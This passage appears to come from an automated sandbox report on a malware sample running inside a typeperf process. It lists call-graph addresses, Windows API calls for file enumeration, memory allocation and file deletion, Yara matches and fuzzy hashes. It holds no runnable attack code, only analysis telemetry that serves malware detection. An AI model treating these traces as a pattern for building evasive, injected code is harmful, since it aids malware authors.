99621 700900 LdrLoadDll 99620->99621 99623 70226c 99621->99623 99622 702280 Sleep 99622->99623 99623->99617 99623->99622 99634 7042d0 99635 7042f1 99634->99635 99636 704326 99634->99636 99638 705f10 LdrLoadDll 99635->99638 99637 705f10 LdrLoadDll 99636->99637 99639 70433c 99637->99639 99640 70430e 99638->99640 99643 30339b0 LdrInitializeThunk 99639->99643 99641 70434b 99643->99641 99644 704e90 99645 704eae 99644->99645 99646 704edf 99644->99646 99648 705f10 LdrLoadDll 99645->99648 99647 705f10 LdrLoadDll 99646->99647 99649 704ef5 NtDeleteFile 99647->99649 99650 704ecb 99648->99650 99663 700714 99664 7006cb 99663->99664 99665 70076c 99664->99665 99668 7035a0 99664->99668 99667 700770 99669 7035fd 99668->99669 99670 703634 99669->99670 99673 6ffe80 99669->99673 99670->99667 99672 703616 99672->99667 99674 6ffe0e 99673->99674 99675 6ffe8c 99673->99675 99676 706c90 2 API calls 99674->99676 99677 6ffe31 99676->99677 99677->99672 99678 6e9940 99679 6e994f 99678->99679 99680 700900 LdrLoadDll 99679->99680 99681 6e996a 99680->99681 99682 6e9990 99681->99682 99683 6e997d CreateThread 99681->99683 99684 6f8901 99692 6f8910 99684->99692 99685 6f8917 99686 700900 LdrLoadDll 99686->99692 99687 6f89ff GetFileAttributesW 99687->99692 99688 6f8baa 99689 6f8bc3 99688->99689 99690 706d20 2 API calls 99688->99690 99690->99689 99691 6f41e0 LdrLoadDll 99691->99692 99692->99685 99692->99686 99692->99687 99692->99688 99692->99691 99693 6fc5d0 2 API calls 99692->99693 99696 7017d0 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 99692->99696 99697 701680 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 99692->99697 99693->99692 99696->99692 99697->99692 99698 6f6480 99699 6f64ae 99698->99699 99700 6f6f60 3 API calls 99699->99700 99701 6f64d6 99700->99701 99702 6f64dd 99701->99702 99705 706e40 LdrLoadDll RtlAllocateHeap 99701->99705 99704 6f64ed 99705->99704 99706 6fe5c0 99707 6fe624 99706->99707 99708 6f41e0 LdrLoadDll 99707->99708 99709 6fe717 99708->99709 99710 6f59f0 3 API calls 99709->99710 99712 6fe74d 99710->99712 99711 6fe754 99712->99711 99713 6f41e0 LdrLoadDll 99712->99713 99714 6fe790 99713->99714 99715 6f5b00 2 API calls 99714->99715 99717 6fe7d0 99715->99717 99716 6fe8f3 99717->99716 99718 6fe902 99717->99718 99740 6fe3a0 99717->99740 99719 704f10 2 API calls 99718->99719 99721 6fe90c 99719->99721 99722 6fe805 99722->99718 99723 6fe810 99722->99723 99724 706e00 2 API calls 99723->99724 99725 6fe839 99724->99725 99726 6fe858 99725->99726 99727 6fe842 99725->99727 99769 6fe290 CoInitialize 99726->99769 99728 704f10 2 API calls 99727->99728 99730 6fe84c 99728->99730 99731 6fe866 99771 704a50 99731->99771 99733 6fe8e2 99734 704f10 2 API calls 99733->99734 99735 6fe8ec 99734->99735 99738 706d20 2 API calls 99735->99738 99737 6fe884 99737->99733 99739 704a50 2 API calls 99737->99739 99777 6fe1c0 LdrLoadDll RtlFreeHeap 99737->99777 99738->99716 99739->99737 99741 6fe3bc 99740->99741 99742 6f3f00 LdrLoadDll 99741->99742 99744 6fe3da 99742->99744 99743 6fe3e3 99743->99722 99744->99743 99745 700900 LdrLoadDll 99744->99745 99746 6fe400 99745->99746 99747 700900 LdrLoadDll 99746->99747 99748 6fe41b 99747->99748 99749 700900 LdrLoadDll 99748->99749 99750 6fe434 99749->99750 99751 700900 LdrLoadDll 99750->99751 99752 6fe450 99751->99752 99753 700900 LdrLoadDll 99752->99753 99754 6fe469 99753->99754 99755 700900 LdrLoadDll 99754->99755 99756 6fe482 99755->99756 99757 6f3f00 LdrLoadDll 99756->99757 99758 6fe4ae 99757->99758 99759 700900 LdrLoadDll 99758->99759 99768 6fe55d 99758->99768 99760 6fe4d3 99759->99760 99761 6f3f00 LdrLoadDll 99760->99761 99762 6fe508 99761->99762 99763 700900 LdrLoadDll 99762->99763 99762->99768 99764 6fe52b 99763->99764 99765 700900 LdrLoadDll 99764->99765 99766 6fe544 99765->99766 99767 700900 LdrLoadDll 99766->99767 99767->99768 99768->99722 99770 6fe2f5 99769->99770 99770->99731 99772 704a6d 99771->99772 99773 705f10 LdrLoadDll 99772->99773 99774 704a7e 99773->99774 99778 3032ba0 LdrInitializeThunk 99774->99778 99775 704a9d 99775->99737 99777->99737 99778->99775 99780 6fc150 99781 6fc172 99780->99781 99782 6f41e0 LdrLoadDll 99781->99782 99783 6fc363 99782->99783 99784 6f41e0 LdrLoadDll 99783->99784 99785 6fc388 99784->99785 99786 6f4120 LdrLoadDll 99785->99786 99787 6fc39c 99786->99787 99811 6fc010 99787->99811 99790 6fc010 6 API calls 99791 6fc412 99790->99791 99792 6fc010 6 API calls 99791->99792 99793 6fc42a 99792->99793 99794 6fc010 6 API calls 99793->99794 99795 6fc442 99794->99795 99796 6fc010 6 API calls 99795->99796 99797 6fc45d 99796->99797 99798 6fc010 6 API calls 99797->99798 99800 6fc475 99798->99800 99799 6fc48f 99800->99799 99801 6fc010 6 API calls 99800->99801 99802 6fc4c3 99801->99802 99803 6fc010 6 API calls 99802->99803 99804 6fc500 99803->99804 99805 6fc010 6 API calls 99804->99805 99806 6fc53d 99805->99806 99807 6fc010 6 API calls 99806->99807 99808 6fc57a 99807->99808 99809 6fc010 6 API calls 99808->99809 99810 6fc5b7 99809->99810 99812 6fc039 99811->99812 99813 700900 LdrLoadDll 99812->99813 99814 6fc079 99813->99814 99815 700900 LdrLoadDll 99814->99815 99816 6fc097 99815->99816 99817 700900 LdrLoadDll 99816->99817 99819 6fc0b9 99817->99819 99818 6fc13d 99818->99790 99819->99818 99820 6fc0e3 FindFirstFileW 99819->99820 99820->99818 99821 6fc0fe 99820->99821 99822 6fc124 FindNextFileW 99821->99822 99825 6fbf20 6 API calls 99821->99825 99822->99821 99824 6fc136 FindClose 99822->99824 99824->99818 99825->99821

                                                                                                                        Executed Functions

                                                                                                                        Function 006E99A0 Relevance: 36.7, Strings: 29, Instructions: 460COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 27 6e99a0-6e9d1d 28 6e9d27-6e9d2e 27->28 29 6e9d53-6e9d5d 28->29 30 6e9d30-6e9d46 28->30 33 6e9d6e-6e9d77 29->33 31 6e9d48-6e9d4e 30->31 32 6e9d51 30->32 31->32 32->28 34 6e9d79-6e9d82 33->34 35 6e9d84-6e9d8b 33->35 34->33 37 6e9d8d-6e9dc0 35->37 38 6e9dc2-6e9dd3 35->38 37->35 39 6e9de4-6e9dee 38->39 40 6e9e04-6e9e0b 39->40 41 6e9df0-6e9e02 39->41 43 6e9e3d-6e9e44 40->43 44 6e9e0d-6e9e3b 40->44 41->39 45 6e9e46-6e9e83 43->45 46 6e9e85-6e9e8f 43->46 44->40 45->43 47 6e9ea0-6e9ea9 46->47 48 6e9ebf-6e9ec6 47->48 49 6e9eab-6e9ebd 47->49 51 6e9eed 48->51 52 6e9ec8-6e9eeb 48->52 49->47 53 6e9ef4-6e9efb 51->53 52->48 54 6e9efd-6e9f0e 53->54 55 6e9f24-6e9f35 53->55 57 6e9f15-6e9f17 54->57 58 6e9f10-6e9f14 54->58 56 6e9f46-6e9f52 55->56 61 6e9f54-6e9f60 56->61 62 6e9f70-6e9f77 56->62 59 6e9f19-6e9f1f 57->59 60 6e9f22 57->60 58->57 59->60 60->53 63 6e9f6e 61->63 64 6e9f62-6e9f68 61->64 65 6e9fa9-6e9fb3 62->65 66 6e9f79-6e9fa7 62->66 63->56 64->63 68 6e9fc4-6e9fcd 65->68 66->62 69 6e9fcf-6e9fdb 68->69 70 6e9fdd-6e9fe1 68->70 69->68 71 6ea00a-6ea014 70->71 72 6e9fe3-6ea008 70->72 74 6ea017-6ea021 71->74 72->70 75 6ea05a-6ea064 74->75 76 6ea023-6ea03e 74->76 79 6ea098-6ea0a1 75->79 80 6ea066-6ea085 75->80 77 6ea045-6ea047 76->77 78 6ea040-6ea044 76->78 81 6ea058 77->81 82 6ea049-6ea052 77->82 78->77 85 6ea0a7-6ea0ae 79->85 86 6ea1e1-6ea1eb 79->86 83 6ea096 80->83 84 6ea087-6ea090 80->84 81->74 82->81 83->75 84->83 88 6ea0d5-6ea0e8 85->88 89 6ea0b0-6ea0d3 85->89 87 6ea1fc-6ea205 86->87 90 6ea207-6ea213 87->90 91 6ea223-6ea22a 87->91 92 6ea0f9-6ea102 88->92 89->85 95 6ea215-6ea21b 90->95 96 6ea221 90->96 97 6ea22c call 7069b0 91->97 98 6ea276-6ea27d 91->98 93 6ea104-6ea110 92->93 94 6ea112-6ea121 92->94 93->92 99 6ea19b-6ea1af 94->99 100 6ea123-6ea12d 94->100 95->96 96->87 107 6ea231-6ea235 97->107 104 6ea27f-6ea2a2 98->104 105 6ea2a4-6ea2ae 98->105 108 6ea1c0-6ea1c9 99->108 106 6ea13e-6ea14a 100->106 104->98 109 6ea14c-6ea15e 106->109 110 6ea160-6ea167 106->110 107->98 111 6ea237-6ea258 107->111 112 6ea1dc 108->112 113 6ea1cb-6ea1da 108->113 109->106 115 6ea199 110->115 116 6ea169-6ea197 110->116 117 6ea25a-6ea263 111->117 118 6ea266-6ea274 111->118 112->79 113->108 115->86 116->110 117->118 118->107
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: !$#W$%v$&,$*$1$5v$6$$9$9$$9D$<N$A$J$M$P$T$V$Vd&,$aE$b$jN$l$p$st$z$|$|G$"
                                                                                                                        • API String ID: 0-826254412
                                                                                                                        • Opcode ID: 7cd60a9cbb5f6e2ea359a0a4d02b52131e6f2e15a0efc431cd9fd654ffd8d270
                                                                                                                        • Instruction ID: 620bc4be8959cb5ffcc463d4d42aebd623271ebaf54fe28b04f4ab4ef653381f
                                                                                                                        • Opcode Fuzzy Hash: 7cd60a9cbb5f6e2ea359a0a4d02b52131e6f2e15a0efc431cd9fd654ffd8d270
                                                                                                                        • Instruction Fuzzy Hash: 4A32DFB0D06268CBEB24CF45C8947DDBBB2BF85308F1081D9D1496B390D7B92A89DF55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 006FC010 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 006FC0F4
                                                                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 006FC12F
                                                                                                                        • FindClose.KERNELBASE(00000000), ref: 006FC13A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3541575487-0
                                                                                                                        • Opcode ID: 7996d9c3c2ef40bdeddb89660e0f03415cd4af35b4098dd8e77b08b45b543974
                                                                                                                        • Instruction ID: 372f373fc8f133473bc4d24e493a1308e3b2c3fd3af1d8bc7b07828fec0686b4
                                                                                                                        • Opcode Fuzzy Hash: 7996d9c3c2ef40bdeddb89660e0f03415cd4af35b4098dd8e77b08b45b543974
                                                                                                                        • Instruction Fuzzy Hash: BD3196B1A0074CFBDB20DFA0CC86FFF77BDAB44755F10455CB608A6281E674AA558BA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00704CA0 Relevance: 1.6, APIs: 1, Instructions: 87filenativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtCreateFile.NTDLL(?,?,?,000000CA,?,?,?,?,?,?,?), ref: 00704D5E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 823142352-0
                                                                                                                        • Opcode ID: 30d8e7833089af46cd114bbf345cf11d712c8085254f924778bf105b5637c3ed
                                                                                                                        • Instruction ID: 58eb91e3caa022c11d3993ca8184715d5fd344b9919f2a552c8971916acb7c70
                                                                                                                        • Opcode Fuzzy Hash: 30d8e7833089af46cd114bbf345cf11d712c8085254f924778bf105b5637c3ed
                                                                                                                        • Instruction Fuzzy Hash: F821D0B2211549BFDB54DF99DC95EEB73EEAF8C714F008208FA0997241D634E851CBA4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00704DD0 Relevance: 1.6, APIs: 1, Instructions: 79filenativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtReadFile.NTDLL(?,?,?,000000CA,?,?,?,?,?), ref: 00704E81
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2738559852-0
                                                                                                                        • Opcode ID: c6cbe1fca1f69d251fb7b363e179ec58e056c8c8992dc877e711bdbba584212d
                                                                                                                        • Instruction ID: b97db5f64da270eaa33d0ab0ac49c054b6826881ad751723bfbda37d901cfa88
                                                                                                                        • Opcode Fuzzy Hash: c6cbe1fca1f69d251fb7b363e179ec58e056c8c8992dc877e711bdbba584212d
                                                                                                                        • Instruction Fuzzy Hash: 472104B2200649AFDB14DF99DC81EEB73EDEF8C714F008208FA19A7241D634F9118BA4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00705040 Relevance: 1.6, APIs: 1, Instructions: 67memorynativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtAllocateVirtualMemory.NTDLL(006F1888,?,006F1F99,00000000,00000004,00003000,00000004,00000000,006F1F99,?,006F1888,006F1F99,?), ref: 007050D9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2167126740-0
                                                                                                                        • Opcode ID: 8b2e28a8aa5a017478c29436a49175c680399554f77787f91accb6b170530f89
                                                                                                                        • Instruction ID: 512fe01921d8961c5446216bc41063486d6df10572496bc435c2861d55956928
                                                                                                                        • Opcode Fuzzy Hash: 8b2e28a8aa5a017478c29436a49175c680399554f77787f91accb6b170530f89
                                                                                                                        • Instruction Fuzzy Hash: 951158B220064ABFDB10DF99DC81EAB73EDEFC9704F008508FA0897241DA34B8118BB4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00704E90 Relevance: 1.5, APIs: 1, Instructions: 47filenativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4033686569-0
                                                                                                                        • Opcode ID: b201e488f55bbf64b3f94a3b9688a55daa12353c9592422b789e308b55fd2678
                                                                                                                        • Instruction ID: 986884d891be464ab629b9706fafaa65175ec4b04c4a5bfd7605b528c51ca3b4
                                                                                                                        • Opcode Fuzzy Hash: b201e488f55bbf64b3f94a3b9688a55daa12353c9592422b789e308b55fd2678
                                                                                                                        • Instruction Fuzzy Hash: F2012171200744BFD220EA1ADC45FAB73ADDFC5324F40850DFA089B282C73479408BB9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00704F10 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00704F44
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Close
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3535843008-0
                                                                                                                        • Opcode ID: f36375a869f0fb8424eafcbc6dcbcf7c194bcefb1b484bf14c7f1598789658c8
                                                                                                                        • Instruction ID: 64e244e10751918596b1fc566d80915bbd8faf2575485f31785e0b7e3e291a89
                                                                                                                        • Opcode Fuzzy Hash: f36375a869f0fb8424eafcbc6dcbcf7c194bcefb1b484bf14c7f1598789658c8
                                                                                                                        • Instruction Fuzzy Hash: 23E08632200704BBD120EA59CC01FDB779DDFC5754F404415FA0867241CA71791187F4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03034340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 713a854d270595aa0929f2f0456f325b3d752d80e28426db1a0b4f2b44cc3865
                                                                                                                        • Instruction ID: 8b458dd239f53c4911bdfc0e32cf51ca9153ebb6acbbd52a5ff7753fcc797b58
                                                                                                                        • Opcode Fuzzy Hash: 713a854d270595aa0929f2f0456f325b3d752d80e28426db1a0b4f2b44cc3865
                                                                                                                        • Instruction Fuzzy Hash: 4790027160680412A140B1588884546404597E0301B55C421E0424554C8B558B665361
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03034650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 7240d378744ca2106d2908c7b51d655bba393e3c5cee55f185d3f79656d6573c
                                                                                                                        • Instruction ID: 783185bea67080233d216911f4ffd9879333236556d71ff6cc2aa96015e9820f
                                                                                                                        • Opcode Fuzzy Hash: 7240d378744ca2106d2908c7b51d655bba393e3c5cee55f185d3f79656d6573c
                                                                                                                        • Instruction Fuzzy Hash: E89002A1602504425140B1588804406604597E1301395C525A0554560C87598A659369
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03032B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 88e980c6b16214b86f873bd31af3ec1f3c5dbfb2231c9cc6a540c722160d5c4c
                                                                                                                        • Instruction ID: 0c516a29f5ad72aa9556b9e6f96abe85018272895f768a50b51b3c0f18bb1082
                                                                                                                        • Opcode Fuzzy Hash: 88e980c6b16214b86f873bd31af3ec1f3c5dbfb2231c9cc6a540c722160d5c4c
                                                                                                                        • Instruction Fuzzy Hash: 109002A1203404035105B1588414616404A87E0201B55C431E1014590DC6668AA16225
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03032BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: bdd034d6efb0fc8ec242643db197debb79692bf4ffa45f37cd2efad90312bba5
                                                                                                                        • Instruction ID: fa1dd6ab01b4986a56546a4edd638ef64cf5f35bdc66d6502c42edfce31d8cd8
                                                                                                                        • Opcode Fuzzy Hash: bdd034d6efb0fc8ec242643db197debb79692bf4ffa45f37cd2efad90312bba5
                                                                                                                        • Instruction Fuzzy Hash: 8790027160640C02E150B1588414746004587D0301F55C421A0024654D87968B6577A1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03032BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 0591524416758727bb630694e9c9109f21221b55570053ce86ef85c742008e1e
                                                                                                                        • Instruction ID: e33eda76f7ffd8ce495fe1e122ed623369aaa463a0f389e53bc82c75c887f526
                                                                                                                        • Opcode Fuzzy Hash: 0591524416758727bb630694e9c9109f21221b55570053ce86ef85c742008e1e
                                                                                                                        • Instruction Fuzzy Hash: A790027120644C42E140B1588404A46005587D0305F55C421A0064694D97668F65B761
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03032BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 91803be361a284a823c49015fceed77d831825acfd90d5391f0265d04e5a99dd
                                                                                                                        • Instruction ID: f0eaceb9904f4328ebefea665e5dfedb1ab19eaa079f13fd51891f6662e86a15
                                                                                                                        • Opcode Fuzzy Hash: 91803be361a284a823c49015fceed77d831825acfd90d5391f0265d04e5a99dd
                                                                                                                        • Instruction Fuzzy Hash: 4A90027120240C02E180B158840464A004587D1301F95C425A0025654DCB568B6977A1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03032AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 7ad7cfb88e2a1596621b2ba1ad0be7a9ef0fc44b42a02ab3a5b7968a2f4166d1
                                                                                                                        • Instruction ID: 9ea57f871ee0c3b49973dacde9b6278c883330dc9281d46240bb3b435e832dab
                                                                                                                        • Opcode Fuzzy Hash: 7ad7cfb88e2a1596621b2ba1ad0be7a9ef0fc44b42a02ab3a5b7968a2f4166d1
                                                                                                                        • Instruction Fuzzy Hash: A5900475313404031105F55C470450700C7C7D5351355C431F1015550CD773CF715331
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03032AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
